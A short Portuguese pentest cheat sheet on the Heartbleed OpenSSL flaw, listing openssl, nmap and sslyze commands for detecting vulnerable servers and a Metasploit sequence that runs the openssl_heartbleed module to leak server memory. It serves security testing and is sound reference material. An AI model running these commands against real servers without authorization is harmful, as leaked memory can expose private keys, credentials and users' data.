Heartbleed

O servidor é considerado vulnerável caso receba algo parecido com: TLS server extension "heartbeat" (id=15), len=1

echo -e "quit\n" | openssl s_client -connect <sitevulneravel.com>:443 -tlsextdebug | grep -i "TLS server extension"

nmap -sS -n -p80,443 --script ssl-heartbleed <www.sitevulneravel.com.br>

sslyze --heartbleed <ip>

msfconsole
use auxiliary/scanner/ssl/openssl_heartbleed
set RHOST <ip_alvo>
set VERBOSE true
exploit

Last updated 5 years ago